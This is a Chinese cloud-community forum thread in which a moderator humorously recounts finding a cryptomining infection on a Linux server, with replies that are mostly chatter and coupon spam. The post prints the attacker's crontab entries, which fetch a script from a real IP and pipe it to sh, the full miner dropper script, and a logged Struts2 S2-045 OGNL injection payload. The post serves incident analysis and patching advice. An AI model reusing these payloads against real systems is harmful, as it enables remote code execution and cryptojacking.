阿里云
服务器地域选择
发表主题 回复主题
  • 3566阅读
  • 12回复

[交流乐园]我竟然被抓去做了比特币挖矿工

级别: 论坛版主
发帖
3364
云币
8810

引言 YU >NGC]}d  
%DOV)Qc2  
u*n%cXY;J/  
LC8&},iu  
世界上还是牛人多,在2011年的时候,一名大三的学生有了困扰,随后上知乎发布了一个提问大三学生手头有6000元,有什么好的理财投资建议?在2017年的今天,上到了知乎热门提问,因为在提问下面有一个获得上万点赞的回答买“比特币,保存好钱包文件,然后忘掉你有过6000元这回事,五年后再看看。 i`k{}!F  
起因 Owd{;  
我是一个服务,并且还是一个内网的Linux服务器,外面武装了天清汉马防火墙,内部有firewall,强大的密码组合,甚至己都记不清到底几位数,这几年我甚是悠闲,悠闲的感觉自己有点混日子,然就是这样一个与世无争的我还是被无情的攻击了。 wz[Xay9jW  
:{7gZ+*  
J  ZH~ {  
那天清晨,感觉大脑有点发烧,赶紧发出一条top指令: 7 LotN6H  
  1. top - 20:07:49 up 70 days,  8:53,  2 users,  load average: 5.71, 5.07, 2.93
  2. Tasks: 200 total,   1 running, 199 sleeping,   0 stopped,   0 zombie
  3. %Cpu(s): 50.2 us,  0.1 sy,  0.0 ni, 49.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
  4. KiB Mem : 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cache
  5. KiB Swap: 32834556 total, 32803700 free,    30856 used. 51442368 avail Mem
  6.   PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
  7. 17257 root      20   0  591340  15220    556 S 599.7  0.0  67:13.74 atd
  8. 15768 root      20   0 15.369g 2.319g  18048 S   1.7  3.7   4:10.49 java
NgI n\) =0  
发现了一条诡异的进程atd,CPU占用居然将近600%,执行命令ps -eaf|grep atd: ^&[Z@*A8#  
  1. [root@itstyle tmp]# ps -ef|grep atd
  2. root     17257     1 99 19:56 ?        01:22:31 ./atd -c trtgsasefd.conf -t 6
  3. root     17475 17165  0 20:10 pts/0    00:00:00 grep --color=auto atd
xlKg0 &D  
紧接着find / -name atd查找相关指令存放地点。 <PMQ$s>KK  
  1. [root@itstyle tmp]# find / -name atd
  2. /var/tmp/atd
/7[U J'  
突然觉得还是先把这个atd进程杀掉为好,kill -9 17257,立即马上迅速强行杀死。 qS|ns'[  
随后退烧了,但可恶的是,不到几分钟,又烧了,一看又是atd这个进程在运行。 pDYcsC{p  
杀掉后重新运行,一定是在某个地方有定时,检查了一下定时任务,crontab -l: czG]rl\1  
  1. [root@itstyle tmp]# crontab -l
  2. */20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh
  3. */19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh
1iLrKA  
擦,以前的定时脚本不见了,多了两条奇怪的任务,里面有个网址很特别,复制到浏览器访问,本以为是个美女或者惊悚图,结果是个大黑图,F12图片网络请求发现Response中居然存在如下代码: 1@}s:  
  1. #!/bin/sh
  2. rm -rf /var/tmp/bmsnxvpggm.conf
  3. ps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk '{print $2}'|xargs kill -9
  4. ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
  5. ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
  6. ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
  7. ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
  8. ps auxf|grep -v grep|grep "bmsnxvpggm"|awk '{print $2}'|xargs kill -9
  9. ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grep
  10. if [ $? -ne 0 ]
  11. then
  12. echo "start process....."
  13. chmod 777 /var/tmp/trtgsasefd.conf
  14. rm -rf /var/tmp/trtgsasefd.conf
  15. curl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
  16. wget -O /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
  17. chmod 777 /var/tmp/atd
  18. rm -rf /var/tmp/atd
  19. rm -rf /var/tmp/sshd
  20. cat /proc/cpuinfo|grep aes>/dev/null
  21. if [ $? -ne 1 ]
  22. then
  23. curl -o /var/tmp/atd http://5.188.87.11/icons/kworker
  24. wget -O /var/tmp/atd http://5.188.87.11/icons/kworker
  25. else
  26. curl -o /var/tmp/atd http://5.188.87.11/icons/kworker_na
  27. wget -O /var/tmp/atd http://5.188.87.11/icons/kworker_na
  28. fi
  29. chmod +x /var/tmp/atd
  30. cd /var/tmp
  31. proc=`grep -c ^processor /proc/cpuinfo`
  32. cores=$((($proc+1)/2))
  33. nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &
  34. else
  35. echo "runing....."
  36. fi
d U}kimz  
一坨脚本,狗  日的 居然有 rm -rf 这是要要了老子的命啊!!! 吓大赶紧打开蓝灯谷歌搜索这个命令,在virustotal找到以下说明: *@+E82D  
QZZt9rA;  
[H4)p ,R  
tDWoQ&z2t_  
z79c30y]"  
同时发现了一条四天前的评论,这是一个脚本,通过struts漏洞传播下载和启动一个bitcode矿工。 pB;8yz=  
n[E/O}3& /  
B'}pZOa[Wb  
在[gov.lk](https://www.gov.lk/services/msdff/es/freightforwarder/view/viewOAuthLogin.action;jsessionid=13A719FCA28E95AC3795CE5ED844F18F.jvm1 "gov.lk")中也发现了有一坨代码,隐约发现与struts2有关: r,8~qHbOT  
fVvB8[(;~  
 I?R?rW  
!,Uzt1K:  
由于一些老旧项目还在使用struts2,于是查询了一下相关日志,居然发现了传说中的OGNL注入 `z1E]{A  
  1. org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
*S= c0  
黑客攻击者通过使用一个表单来发送一些内容到struts请求,该内容被OGNL解析,结果创建了crontab,擦,真是耳闻不如一见啊,也有中招的那一天,就这样我变成了一个苦逼的挖矿工。 YiGSFg  
Sv>bU4LHf  
. UaLP  
EvGKcu  
/w/um>>K.  
挖矿组织 (k$KUP  
pPH"6   
\ $Q?  
Struts2的安全漏洞从2010年开始陆续被披露存在远程代码执行漏洞,从2010年的S2-005、S2-009、S2-013 S2-016、S2-019、S2-020、S2-032、S2-037、devMode、及2017年3月初Struts2披露的S045漏洞,每一次的漏洞爆发随后互联网都会出现Struts2扫描攻击活动。 X%R)  
=N^j:t  
wQw&.)T  
此次攻击针对Struts2的远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,黑客通过批量对互联网的WEB应用服务器发起攻击,并下载恶意脚本执行下载进行比特币挖矿程序,主要感染Linux服务器。 d`sIgll&n  
g^)8a;/c  
Dd' 4W  
"QLp%B,A  
经检测和搜索,这应该是一个有组织有纪律的挖矿集团,以下是IP地址来源,万恶的苏修主义啊,真是亡我天朝之心不死。 =u<jxV9  
p%#=OtkC  
[]<N@a6VA>  
4NDT5sL  
解决方案 iPK:gK3Q  
  • Struts2升级版本至2.5.10,高危漏洞又来了 ,这是三月份的一篇升级,当时投机的还是赶紧升了吧,如果实在不想升级,无所谓反正是挖矿,不会破坏你什么。但是,如果不挖矿,那就傻  逼了?到时候就不是发烧那么简单了,很多公司上线部署都不是很规范,可能所有的程序都用root启动也说不定呢?
  • 可以选用阿里云云盾WAF产品进行防御。 Web应用防火墙(Web Application Firewall, 简称 WAF), 是阿里基于10余年攻防经验完全自主研发的安全产品。其基于云安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意访问,避免您的网站资产数据泄露,保障网站的安全与可用性。
9Ac4'L  
如何注入 +@BjQ|UZ  
_%@ri]u{ov  
fl+dL#]  
最后感觉这才是大家比较关注的问题,肯定有不少小伙伴想知道黑客是怎么注入的吧? '9tV-whw  
人们都说,只要心够诚,就能在西边疙瘩山上寻得一当铺,进去,便能改变你的一生,其实我也不知道。 8dlhL8#  
^X| Bzz)  
云栖社区 LA4,o@V`  
[ 此帖被小柒2012在2017-09-21 17:15重新编辑 ]
你只看到我的技术,却没看到我的通宵。 你有你的需求,我有我的选择。 你嘲笑我技术宅孤独一生,我可怜你只能呆呆站在墙里。 你可以轻视昼夜不分的Coding,但我会证明它至少可以买到xx票。 技术宅的路上少不了苦逼和孤独,又怎样,哪怕成不了大神,也要码的漂亮。我是IT男,我为自己代言!
级别: 新人
发帖
1
云币
1
只看该作者 沙发  发表于: 09-21
Re我竟然被抓去做了比特币挖矿工
级别: 码农
发帖
110
云币
133
只看该作者 板凳  发表于: 09-26
Re我竟然被抓去做了比特币挖矿工
666
级别: 管理员
发帖
743
云币
778
只看该作者 地板  发表于: 09-28
这个经历甚是诡异
级别: 管理员
发帖
743
云币
778
只看该作者 4楼 发表于: 09-28
级别: 新人
发帖
14
云币
17
只看该作者 5楼 发表于: 09-28
Re我竟然被抓去做了比特币挖矿工
哈哈哈哈 可惜不能交易咯
级别: 新人
发帖
1
云币
1
只看该作者 6楼 发表于: 09-29
Re我竟然被抓去做了比特币挖矿工
大哥文笔不错啊
级别: 新人
发帖
1
云币
1
只看该作者 7楼 发表于: 09-30
Re我竟然被抓去做了比特币挖矿工
6666666666
级别: 菜鸟
发帖
50
云币
69
只看该作者 8楼 发表于: 10-05
Re我竟然被抓去做了比特币挖矿工
有钱赚吗? JXG%Cx!2}  
{> T r22S  
我有几张阿里云幸运券分享给你,用券购买或者升级阿里云相应产品会有特惠惊喜哦!把想要买的产品的幸运券都领走吧!快下手,马上就要抢光了。 t'msgC6=>u  
https://promotion.aliyun.com/ntms/act/ambassador/sharetouser.html?userCode=6evata1e&utm_source=6evata1e
级别: 新人
发帖
2
云币
2
只看该作者 9楼 发表于: 10-10
Re我竟然被抓去做了比特币挖矿工
我有几张#阿里云#幸运券分享给你,用券购买或者升级阿里云相应产品会有特惠惊喜哦!把想要买的产品的幸运券都领走吧!快下手,马上就要抢光了。 oPSucz&s  
级别: 小白
发帖
22
云币
28
只看该作者 10楼 发表于: 10-11
Re我竟然被抓去做了比特币挖矿工
666
级别: 新人
发帖
6
云币
6
只看该作者 11楼 发表于: 10-11
Re我竟然被抓去做了比特币挖矿工
666
级别: 论坛版主
发帖
3364
云币
8810

只看该作者 12楼 发表于: 10-15
回 9楼(一小刀一) 的帖子
直接送我 人民币吧
你只看到我的技术,却没看到我的通宵。 你有你的需求,我有我的选择。 你嘲笑我技术宅孤独一生,我可怜你只能呆呆站在墙里。 你可以轻视昼夜不分的Coding,但我会证明它至少可以买到xx票。 技术宅的路上少不了苦逼和孤独,又怎样,哪怕成不了大神,也要码的漂亮。我是IT男,我为自己代言!
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
批量上传需要先选择文件,再选择上传
 
验证问题: 18 - 4 = ?
上一个 下一个